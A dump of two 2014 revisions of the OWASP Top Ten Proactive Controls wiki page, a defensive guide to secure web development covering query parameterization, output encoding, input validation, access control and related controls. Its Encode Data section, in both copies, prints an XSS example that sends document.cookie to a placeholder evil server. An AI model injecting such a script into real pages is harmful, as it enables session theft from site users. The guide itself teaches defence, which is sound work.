[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=176098OWASP Proactive Controls2014-05-30T17:49:52Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls complete document here].<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of Query Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* [https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide OWASP Secure Coding Practices Quick Reference Guide]<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to prevent Cross Site Scripting. <br />
<br />
Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in the user's browser and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include unix encoding, windows encoding, LDAP encoding, XML encoding and others.<br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project]<br />
* [https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project OWASP Encoder Comparison Reference Project]<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
It is critical to treat all input from outside of the application (for example, from browsers or mobile clients, from outside systems or files) as untrusted. For web applications this includes HTTP headers, cookies, and GET and POST parameters: any or all of this data could be compromised by an attacker.<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types of input validation: “white list" validation and "black list" validation. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively because it can be bypassed through encoding and other obfuscation techniques, and is not recommended when building a secure web application. The following examples will focus on white list validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation white list of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* [[Input Validation Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_JSON_Sanitizer OWASP JSON Sanitizer Project]<br />
* [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer OWASP Java HTML Sanitizer Project]<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature of resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused. Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a users role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/OWASP_PHPRBAC_Project OWASP PHPRBAC Project]<br />
<br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the Google KeyCzar project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issue in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/O-Saft OWASP SSL Audit for Testers]<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
<br />
== 7: Implement Logging and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The [[OWASP AppSensor Project]] defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. <br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* [http://static.springsource.org/spring-security/site/index.html Spring Security]<br />
* [http://shiro.apache.org/ Apache Shiro]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet PHP Security Cheat Sheet]<br />
* [https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet .NET Security Cheat Sheet]<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model]<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (OpenSAMM)]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project Application Security Verification Standard Project]<br />
* [https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet Application Security Architecture Cheat Sheet]<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* [[Threat Modeling Cheat Sheet]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of April : Complete community review process<br/><br />
End of May : Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=174511OWASP Proactive Controls2014-05-07T21:33:18Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls complete document here].<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* [https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide OWASP Secure Coding Practices Quick Reference Guide]<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to Cross Site Scripting. Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include unix encoding, windows encoding, LDAP encoding, XML encoding and others.<br />
<br />
'''Key References'''<br />
